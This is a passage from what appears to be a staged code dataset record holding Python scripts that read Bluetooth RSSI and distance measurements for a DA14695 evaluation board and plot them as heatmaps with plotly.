in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_los_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_los_hist2d.append(column)\n rssi_los_hist2d = np.array(rssi_los_hist2d).T\n dist_los_hist2d = np.array(dist_los_hist2d).T\n rssi_blocked_hist2d = []\n dist_blocked_hist2d = []\n experiment = 'distance_blocked'\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_blocked_hist2d.append(column)\n column = np.zeros(1000)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_blocked_hist2d.append(column)\n rssi_blocked_hist2d = np.array(rssi_blocked_hist2d).T\n dist_blocked_hist2d = np.array(dist_blocked_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n db_lim[0], db_lim[1], -1), z=rssi_los_hist2d[int(-db_lim[0]):int(-\n db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n dist_lim[0], dist_lim[1], 0.1), z=dist_los_hist2d[int(dist_lim[0] /\n 0.1):int(dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n db_lim[0], db_lim[1], -1), z=rssi_blocked_hist2d[int(-db_lim[0]):\n int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=2)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n dist_lim[0], dist_lim[1], 0.1), z=dist_blocked_hist2d[int(dist_lim[\n 0] / 0.1):int(dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=2)\n fig.add_trace(go.Scatter(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n 0.75, 3.25, 0.25), mode='lines', line=ref_line), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n 0.75, 3.25, 0.25), mode='lines', line=ref_line), row=2, col=2)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Separation (m)', row=2, col=1)\n fig.update_xaxes(title='Separation (m)', row=2, col=2)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'distance_%s.png' % antenna)\n )\n", "step-3": "<mask token>\noutput_directory = 'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/figures'\nantennas = ['original_whip']\nfolder = 'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/data'\nri_filenames = []\nfor i_angle in np.arange(0, 360, 45):\n ri_filenames.append('r%di%d.csv' % (i_angle, i_angle))\n ri_filenames.append('r%di%d.csv' % (i_angle + 45, i_angle))\nri_filenames.append('r360i360.csv')\nangle_filenames = [('%d.csv' % n) for n in np.arange(0, 405, 45)]\ndistance_filenames = [('%1.2f.csv' % n) for n in np.arange(0.75, 3.25, 0.25)]\nref_line = dict(color='white', width=1)\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. yaw', 'Calculated distance vs. yaw'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp1'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp1_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. pitch', 'Calculated distance vs. pitch'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp2'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp2_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. roll', 'Calculated distance vs. roll'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp3'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp3_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. position', 'Calculated distance vs. position'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp4'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in angle_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 360, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 360, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 360, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp4_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=2, subplot_titles=['Line of sight',\n 'Blocked'], shared_xaxes=True)\n rssi_los_hist2d = []\n dist_los_hist2d = []\n experiment = 'distance_los'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_los_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_los_hist2d.append(column)\n rssi_los_hist2d = np.array(rssi_los_hist2d).T\n dist_los_hist2d = np.array(dist_los_hist2d).T\n rssi_blocked_hist2d = []\n dist_blocked_hist2d = []\n experiment = 'distance_blocked'\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_blocked_hist2d.append(column)\n column = np.zeros(1000)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_blocked_hist2d.append(column)\n rssi_blocked_hist2d = np.array(rssi_blocked_hist2d).T\n dist_blocked_hist2d = np.array(dist_blocked_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n db_lim[0], db_lim[1], -1), z=rssi_los_hist2d[int(-db_lim[0]):int(-\n db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n dist_lim[0], dist_lim[1], 0.1), z=dist_los_hist2d[int(dist_lim[0] /\n 0.1):int(dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n db_lim[0], db_lim[1], -1), z=rssi_blocked_hist2d[int(-db_lim[0]):\n int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=2)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n dist_lim[0], dist_lim[1], 0.1), z=dist_blocked_hist2d[int(dist_lim[\n 0] / 0.1):int(dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=2)\n fig.add_trace(go.Scatter(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n 0.75, 3.25, 0.25), mode='lines', line=ref_line), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n 0.75, 3.25, 0.25), mode='lines', line=ref_line), row=2, col=2)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Separation (m)', row=2, col=1)\n fig.update_xaxes(title='Separation (m)', row=2, col=2)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'distance_%s.png' % antenna)\n )\n", "step-4": "import numpy as np\nimport plotly\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport pandas as pd\nimport os\noutput_directory = 'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/figures'\nantennas = ['original_whip']\nfolder = 'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/data'\nri_filenames = []\nfor i_angle in np.arange(0, 360, 45):\n ri_filenames.append('r%di%d.csv' % (i_angle, i_angle))\n ri_filenames.append('r%di%d.csv' % (i_angle + 45, i_angle))\nri_filenames.append('r360i360.csv')\nangle_filenames = [('%d.csv' % n) for n in np.arange(0, 405, 45)]\ndistance_filenames = [('%1.2f.csv' % n) for n in np.arange(0.75, 3.25, 0.25)]\nref_line = dict(color='white', width=1)\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. yaw', 'Calculated distance vs. yaw'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp1'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp1_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. pitch', 'Calculated distance vs. pitch'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp2'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp2_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. roll', 'Calculated distance vs. roll'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp3'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp3_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. position', 'Calculated distance vs. position'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp4'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in angle_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 360, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 360, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 360, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n 